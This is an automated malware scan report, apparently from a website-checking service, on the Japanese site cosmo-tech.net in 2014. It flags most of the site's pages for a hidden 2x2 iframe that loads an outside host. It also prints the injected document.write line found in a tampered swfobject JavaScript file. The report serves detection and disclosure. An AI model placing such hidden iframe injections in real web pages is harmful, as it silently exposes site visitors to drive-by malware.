Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cosmo-tech.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cosmo-tech.net/ | 200 OK Content-Length: 11729 Content-Type: text/html | clean |
http://cosmo-tech.net/gaiyo/index.html/ | 200 OK Content-Length: 50881 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/annai/ | 200 OK Content-Length: 23128 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/gaiyo/ | 200 OK Content-Length: 50881 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/shou/ | 200 OK Content-Length: 9995 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/shou/Scripts/swfobject_modified.js | 200 OK Content-Length: 21880 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?j=1483551></iframe>');
var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst var obj = getElementById(EXPRESS_INSTALL_ID); if (obj) { obj.parentNode.replaceChild(storedAltContent, obj); if (storedAltContentId) { setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?j=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?j=1483551> | ||
http://cosmo-tech.net/shou/saponin.html | 200 OK Content-Length: 15469 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/purai/ | 200 OK Content-Length: 12108 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/test404page.js | 404 Not Found Content-Length: 276 Content-Type: text/html | clean |
http://cosmo-tech.net/shou/saponin_2.html | 200 OK Content-Length: 15510 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/shou/saponin_3.html | 200 OK Content-Length: 7361 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> | ||
http://cosmo-tech.net/shou/kitin.html | 200 OK Content-Length: 28878 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/occf.html?i=1483551> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cosmo-tech.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 06 Sep 2014 06:43:22 GMT
Accept-Ranges: bytes
Server: nginx
Content-Length: 11729
Content-Type: text/html
Last-Modified: Wed, 04 Sep 2013 08:59:51 GMT
X-Powered-By: PleskLin
...11729 bytes of data.
GET / HTTP/1.1
Host: cosmo-tech.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 06 Sep 2014 06:43:22 GMT
Accept-Ranges: bytes
Server: nginx
Content-Length: 11729
Content-Type: text/html
Last-Modified: Wed, 04 Sep 2013 08:59:51 GMT
X-Powered-By: PleskLin
...11729 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cosmo-tech.net
Referer: http://www.google.com/search?q=cosmo-tech.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cosmo-tech.net
Referer: http://www.google.com/search?q=cosmo-tech.net
Result:
The result is similar to the first query. There are no suspicious redirects found.